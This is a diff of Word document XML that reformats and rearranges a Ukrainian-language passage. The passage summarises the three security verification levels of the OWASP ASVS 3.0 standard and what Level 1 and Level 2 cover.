-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
         <w:t>.</w:t>
       </w:r>
       <w:r>
@@ -4846,8 +5778,6 @@
         </w:rPr>
         <w:br/>
       </w:r>
-      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="0"/>
     </w:p>
     <w:sectPr>
       <w:pgSz w:w="11906" w:h="16838"/>
@@ -6140,6 +7070,56 @@
       <w:u w:val="single"/>
     </w:rPr>
   </w:style>
+  <w:style w:type="paragraph" w:styleId="HTML">
+    <w:name w:val="HTML Preformatted"/>
+    <w:basedOn w:val="a"/>
+    <w:link w:val="HTML0"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00A4764C"/>
+    <w:pPr>
+      <w:tabs>
+        <w:tab w:val="left" w:pos="916"/>
+        <w:tab w:val="left" w:pos="1832"/>
+        <w:tab w:val="left" w:pos="2748"/>
+        <w:tab w:val="left" w:pos="3664"/>
+        <w:tab w:val="left" w:pos="4580"/>
+        <w:tab w:val="left" w:pos="5496"/>
+        <w:tab w:val="left" w:pos="6412"/>
+        <w:tab w:val="left" w:pos="7328"/>
+        <w:tab w:val="left" w:pos="8244"/>
+        <w:tab w:val="left" w:pos="9160"/>
+        <w:tab w:val="left" w:pos="10076"/>
+        <w:tab w:val="left" w:pos="10992"/>
+        <w:tab w:val="left" w:pos="11908"/>
+        <w:tab w:val="left" w:pos="12824"/>
+        <w:tab w:val="left" w:pos="13740"/>
+        <w:tab w:val="left" w:pos="14656"/>
+      </w:tabs>
+      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+    </w:pPr>
+    <w:rPr>
+      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+      <w:sz w:val="20"/>
+      <w:szCs w:val="20"/>
+      <w:lang w:eastAsia="ru-RU"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="HTML0">
+    <w:name w:val="Стандартный HTML Знак"/>
+    <w:basedOn w:val="a0"/>
+    <w:link w:val="HTML"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:rsid w:val="00A4764C"/>
+    <w:rPr>
+      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+      <w:sz w:val="20"/>
+      <w:szCs w:val="20"/>
+      <w:lang w:eastAsia="ru-RU"/>
+    </w:rPr>
+  </w:style>
 </w:styles>
 </file>
 
@@ -6408,6 +7388,56 @@
     <w:rPr>
       <w:color w:val="0000FF"/>
       <w:u w:val="single"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="HTML">
+    <w:name w:val="HTML Preformatted"/>
+    <w:basedOn w:val="a"/>
+    <w:link w:val="HTML0"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00A4764C"/>
+    <w:pPr>
+      <w:tabs>
+        <w:tab w:val="left" w:pos="916"/>
+        <w:tab w:val="left" w:pos="1832"/>
+        <w:tab w:val="left" w:pos="2748"/>
+        <w:tab w:val="left" w:pos="3664"/>
+        <w:tab w:val="left" w:pos="4580"/>
+        <w:tab w:val="left" w:pos="5496"/>
+        <w:tab w:val="left" w:pos="6412"/>
+        <w:tab w:val="left" w:pos="7328"/>
+        <w:tab w:val="left" w:pos="8244"/>
+        <w:tab w:val="left" w:pos="9160"/>
+        <w:tab w:val="left" w:pos="10076"/>
+        <w:tab w:val="left" w:pos="10992"/>
+        <w:tab w:val="left" w:pos="11908"/>
+        <w:tab w:val="left" w:pos="12824"/>
+        <w:tab w:val="left" w:pos="13740"/>
+        <w:tab w:val="left" w:pos="14656"/>
+      </w:tabs>
+      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+    </w:pPr>
+    <w:rPr>
+      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+      <w:sz w:val="20"/>
+      <w:szCs w:val="20"/>
+      <w:lang w:eastAsia="ru-RU"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="HTML0">
+    <w:name w:val="Стандартный HTML Знак"/>
+    <w:basedOn w:val="a0"/>
+    <w:link w:val="HTML"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:rsid w:val="00A4764C"/>
+    <w:rPr>
+      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+      <w:sz w:val="20"/>
+      <w:szCs w:val="20"/>
+      <w:lang w:eastAsia="ru-RU"/>
     </w:rPr>
   </w:style>
 </w:styles>

--- a/Bullshit.docx
+++ b/Bullshit.docx
@@ -4024,7 +4024,6 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
     </w:p>
@@ -4078,9 +4077,127 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Зг</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>і</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>дно</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> до стандарту </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-      </w:pPr>
+        <w:t>ASVS</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 3.0 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t xml:space="preserve">запропонованого організацією </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>OWASP</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t xml:space="preserve">можна виділити три </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>р</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>івні перевірки безпеки програмних додатків</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4089,116 +4206,42 @@
         <w:ind w:left="0"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="uk-UA"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>Зг</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="uk-UA"/>
-        </w:rPr>
-        <w:t>і</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>дно</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="uk-UA"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> до стандарту </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>ASVS</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 3.0 </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="uk-UA"/>
-        </w:rPr>
-        <w:t xml:space="preserve">запропонованого організацією </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>OWASP</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="uk-UA"/>
-        </w:rPr>
-        <w:t xml:space="preserve">можна виділити три </w:t>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:br/>
       </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="uk-UA"/>
-        </w:rPr>
-        <w:t>р</w:t>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>Р</w:t>
       </w:r>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="uk-UA"/>
-        </w:rPr>
-        <w:t>івні перевірки безпеки програмних додатків</w:t>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>івень1 призначений для всіх програм.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4215,14 +4258,6 @@
           <w:lang w:val="uk-UA"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
@@ -4243,8 +4278,21 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>івень</w:t>
-      </w:r>
+        <w:t>івень 2 призначений для додатків, які містять конфіденційні дані, які вимагають захисту.  </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4252,92 +4300,9 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>1 призначений для всіх програм.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="212121"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="uk-UA"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="212121"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>Р</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="212121"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>івень 2 призначений для додатків, які містять конфіденційні дані, які вимагають захисту</w:t>
-      </w:r>
-      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="0"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="212121"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>.  </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="uk-UA"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="212121"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="uk-UA"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Рівень </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="212121"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="uk-UA"/>
-        </w:rPr>
-        <w:t xml:space="preserve">3 для найбільш важливих додатків - додатків, які </w:t>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Рівень 3 для найбільш важливих додатків - додатків, які </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4579,6 +4544,841 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>Додаток досягає ASVS 1-го рівня (або опортуністичних), якщо він адекватно захищає від вразливостей безпеки додатків, які легко виявити, і включені в OWASP Top 10 і інших подібних контрольних списків.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Рівень 1 зазвичай підходить для додатків, де потрібна низька впевненість у правильному використанні засобів контролю безпеки або для швидкого аналізу парку корпоративних додатків або сприяння в розробці пріоритетного списку вимог безпеки в рамках багатофазного зусилля. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Елементи управління </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>р</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">івня 1 можуть бути забезпечені або автоматично за допомогою інструментів, або просто вручну без доступу до вихідного коду. Ми розглядаємо </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>р</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>івень 1 як мінімум необхідний для всіх додатків. Загрози для додатка, швидше за все, будуть від зловмисників, які використовують прості і маловитратні методи для виявлення легкодоступних і простих у використанні вразливостей.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>Додаток</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>досягає</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ASVS 2-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>го</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>р</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>івня</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
